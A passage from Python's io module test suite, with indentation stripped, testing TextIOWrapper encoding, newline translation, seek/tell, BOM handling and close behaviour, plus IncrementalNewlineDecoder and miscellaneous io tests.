t = self.TextIOWrapper(b, encoding='ascii')
t.write('howdy')
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b'howdy')
self.assertRaises(ValueError, t.detach)
repr(t)
self.assertEqual(t.encoding, 'ascii')
self.assertEqual(t.errors, 'strict')
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO('hello'.encode('utf-8'))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding='utf-8')
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t), "<%s.TextIOWrapper encoding='utf-8'>" %
modname)
raw.name = 'dummy'
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = 'r'
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" %
modname)
raw.name = b'dummy'
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" %
modname)
t.buffer.detach()
repr(t)
def test_recursive_repr(self):
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t)
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline='\n', line_buffering=True)
t.write('X')
self.assertEqual(r.getvalue(), b'')
t.write('Y\nZ')
self.assertEqual(r.getvalue(), b'XY\nZ')
t.write('A\rB')
self.assertEqual(r.getvalue(), b'XY\nZA\rB')
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
import _testcapi
b = self.BytesIO()
b.fileno = lambda : _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda : _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='utf-8')
self.assertEqual(t.encoding, 'utf-8')
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii')
self.assertRaises(UnicodeError, t.read)
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii', errors='strict')
self.assertRaises(UnicodeError, t.read)
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii', errors='ignore')
self.assertEqual(t.read(), 'abc\n\n')
b = self.BytesIO(b'abc\n\xff\n')
t = self.TextIOWrapper(b, encoding='ascii', errors='replace')
self.assertEqual(t.read(), 'abc\n�\n')
def test_encoding_errors_writing(self):
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii')
self.assertRaises(UnicodeError, t.write, 'ÿ')
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii', errors='strict')
self.assertRaises(UnicodeError, t.write, 'ÿ')
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii', errors='ignore',
newline='\n')
t.write('abcÿdef\n')
t.flush()
self.assertEqual(b.getvalue(), b'abcdef\n')
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding='ascii', errors='replace',
newline='\n')
t.write('abcÿdef\n')
t.flush()
self.assertEqual(b.getvalue(), b'abc?def\n')
def test_newlines(self):
input_lines = ['unix\n', 'windows\r\n', 'os9\r', 'last\n', 'nonl']
tests = [[None, ['unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl']],
['', input_lines], ['\n', ['unix\n', 'windows\r\n',
'os9\rlast\n', 'nonl']], ['\r\n', ['unix\nwindows\r\n',
'os9\rlast\nnonl']], ['\r', ['unix\nwindows\r', '\nos9\r',
'last\nnonl']]]
encodings = ('utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be')
for encoding in encodings:
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize
)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b'AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG'
normalized = testdata.replace(b'\r\n', b'\n').replace(b'\r', b'\n')
for newline, expected in [(None, normalized.decode('ascii').
splitlines(keepends=True)), ('', testdata.decode('ascii').
splitlines(keepends=True)), ('\n', ['AAA\n', 'BB\x00B\n',
'CCC\rDDD\rEEE\r\n', 'FFF\r\n', 'GGG']), ('\r\n', [
'AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n', 'FFF\r\n', 'GGG']), ('\r', [
'AAA\nBB\x00B\nCCC\r', 'DDD\r', 'EEE\r', '\nFFF\r', '\nGGG'])]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding='ascii', newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), ''.join(expected))
def test_newlines_output(self):
testdict = {'': b'AAA\nBBB\nCCC\nX\rY\r\nZ', '\n':
b'AAA\nBBB\nCCC\nX\rY\r\nZ', '\r': b'AAA\rBBB\rCCC\rX\rY\r\rZ',
'\r\n': b'AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ'}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding='ascii', newline=newline)
txt.write('AAA\nB')
txt.write('BB\nCCC\n')
txt.write('X\rY\r\nZ')
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding='ascii')
t.write('abc')
del t
support.gc_collect()
self.assertEqual([b'abc'], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding='ascii')
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output('stderr') as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith('Exception OSError: '), s)
self.assertTrue(s.endswith(' ignored'), s)
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in ('ascii', 'latin-1', 'utf-8'):
f = self.open(support.TESTFN, 'w+', encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write('abc'), 3)
f.close()
f = self.open(support.TESTFN, 'r+', encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), 'abc')
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), 'abc')
f.seek(0)
self.assertEqual(f.read(2), 'ab')
self.assertEqual(f.read(1), 'c')
self.assertEqual(f.read(1), '')
self.assertEqual(f.read(), '')
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write('def'), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), 'def')
if enc.startswith('utf'):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = 'sÿ\u0fff\uffff'
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = ''.join(chars) + '\n'
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, 'w+', encoding='utf-8')
p0 = f.tell()
f.write('ÿ\n')
p1 = f.tell()
f.write('ÿ\n')
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), 'ÿ\n')
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), 'ÿ\n')
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, 'ÿ\n')
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = 'a' * prefix_size
prefix = bytes(u_prefix.encode('utf-8'))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = '袈\n'
suffix = bytes(u_suffix.encode('utf-8'))
line = prefix + suffix
with self.open(support.TESTFN, 'wb') as f:
f.write(line * 2)
with self.open(support.TESTFN, 'r', encoding='utf-8') as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, 'ascii'))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, 'wb') as f:
f.write(data)
with self.open(support.TESTFN, 'r', encoding='utf-8') as f:
f._CHUNK_SIZE
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1):
for j in [1, 5, len(decoded) - i]:
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
StatefulIncrementalDecoder.codecEnabled = 1
try:
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input) // 2
prefix = b'.' * offset
min_pos = offset * 2
test_seek_and_tell_with_data(prefix + input, min_pos)
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = '1234567890'
tests = ('utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le',
'utf-32-be')
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b'AA\r\nBB'))
reads = ''
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, 'AA\nBB')
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b'AA\nBB\nCC'))
self.assertEqual(txt.readlines(), ['AA\n', 'BB\n', 'CC'])
txt.seek(0)
self.assertEqual(txt.readlines(None), ['AA\n', 'BB\n', 'CC'])
txt.seek(0)
self.assertEqual(txt.readlines(5), ['AA\n', 'BB\n'])
def test_read_by_chunk(self):
txt = self.TextIOWrapper(self.BytesIO(b'A' * 127 + b'\r\nB'))
reads = ''
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, 'A' * 127 + '\nB')
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
reads = ''
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = ''
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), 'BBB\n')
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding='ascii')
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, 'w') as f:
self.assertEqual(f.errors, 'strict')
with self.open(support.TESTFN, 'w', errors='replace') as f:
self.assertEqual(f.errors, 'replace')
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
event = threading.Event()
with self.open(support.TESTFN, 'w', buffering=1) as f:
def run(n):
text = 'Thread%03d\n' % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,)) for x in
range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count('Thread%03d\n' % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close)
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed)
self.assertFalse(closed[0])
self.assertFalse(closed[1])
txt.flush = lambda : None
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding='ascii')
txt.flush = bad_flush
with self.assertRaises(OSError) as err:
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding='ascii')
txt.flush = bad_flush
with self.assertRaises(NameError) as err:
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding='ascii')
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b'a'
bufio = BufferedWriter(rawio, len(data) * 2)
textio = self.TextIOWrapper(bufio, encoding='ascii', write_through=True
)
text = data.decode('ascii')
textio.write(text)
self.assertFalse(flush_called)
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b'')
write_called = []
textio.write(text * 10)
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11)
def test_read_nonbytes(self):
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
def _make_illegal_wrapper():
quopri = codecs.lookup('quopri')
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline=
'\n', encoding='quopri')
finally:
quopri._is_text_encoding = False
return t
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
iomod = self.io.__name__
code = (
"""if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
"""
.format(iomod=iomod, kwargs=kwargs))
return assert_python_ok('-c', code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual('ok', out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual('ok', out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self):
return True
def writable(self):
return True
def seekable(self):
return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
"""A BytesIO object whose read method returns memoryviews
rather than bytes"""
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
"""Convert bytes-object *buf* to a non-trivial memoryview"""
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = 'RuntimeError: could not find io module state'
def test_initialization(self):
r = self.BytesIO(b'\xc3\xa9\n\n')
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, 'wb')
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding='ascii')
t.write('456def')
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'456def')
def test_rwpair_cleared_before_textio(self):
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding='ascii')
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding='ascii')
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = 'LookupError: unknown encoding: ascii'
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
def _check_decode(b, s, **kwargs):
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', '袈')
_check_decode(b'\xe8', '')
_check_decode(b'\xa2', '')
_check_decode(b'\x88', '袈')
_check_decode(b'\xe8', '')
_check_decode(b'\xa2', '')
_check_decode(b'\x88', '袈')
_check_decode(b'\xe8', '')
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', '\n')
_check_decode(b'\r', '')
_check_decode(b'', '\n', final=True)
_check_decode(b'\r', '\n', final=True)
_check_decode(b'\r', '')
_check_decode(b'a', '\na')
_check_decode(b'\r\r\n', '\n\n')
_check_decode(b'\r', '')
_check_decode(b'\r', '\n')
_check_decode(b'\na', '\na')
_check_decode(b'\xe8\xa2\x88\r\n', '袈\n')
_check_decode(b'\xe8\xa2\x88', '袈')
_check_decode(b'\n', '\n')
_check_decode(b'\xe8\xa2\x88\r', '袈')
_check_decode(b'\n', '\n')
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise('abc\n\r')
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise('\nabc')
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise('abc\r')
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise('abc')
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise('abc\r')
self.assertEqual(''.join(result), 'abc\n\nabcabc\nabcabc')
decoder.reset()
input = 'abc'
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), 'abc')
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le',
'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be')
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder('utf-8')()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode('\u0d00'), '\u0d00')
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode('\u0a00'), '\u0a00')
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == 'open':
continue
elif 'error' in name.lower() or name == 'UnsupportedOperation':
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith('SEEK_'):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, 'wb', buffering=0)
self.assertEqual(f.mode, 'wb')
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, 'U')
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, 'U')
self.assertEqual(f.buffer.mode, 'rb')
self.assertEqual(f.buffer.raw.mode, 'rb')
f.close()
f = self.open(support.TESTFN, 'w+')
self.assertEqual(f.mode, 'w+')
self.assertEqual(f.buffer.mode, 'rb+')
self.assertEqual(f.buffer.raw.mode, 'rb+')
g = self.open(f.fileno(), 'wb', closefd=False)
self.assertEqual(g.mode, 'wb')
self.assertEqual(g.raw.mode, 'wb')
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [{'mode': 'w'}, {'mode': 'wb'}, {'mode': 'w',
'buffering': 1}, {'mode': 'w', 'buffering': 2}, {'mode': 'wb',
'buffering': 0}, {'mode': 'r'}, {'mode': 'rb'}, {'mode': 'r',
'buffering': 1}, {'mode': 'r', 'buffering': 2}, {'mode': 'rb',
'buffering': 0}, {'mode': 'w+'}, {'mode': 'w+b'}, {'mode': 'w+',
'buffering': 1}, {'mode': 'w+', 'buffering': 2}, {'mode': 'w+b',
'buffering': 0}]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, 'peek'):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, 'read1'):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, 'readall'):
self.assertRaises(ValueError, f.readall)
if hasattr(f, 'readinto'):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, 'readinto1'):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write, b'' if 'b' in kwargs[
'mode'] else '')
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
class C(str):
pass
c = C('')
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
self.assertIsInstance(self.IOBase, abc.ABCMeta)
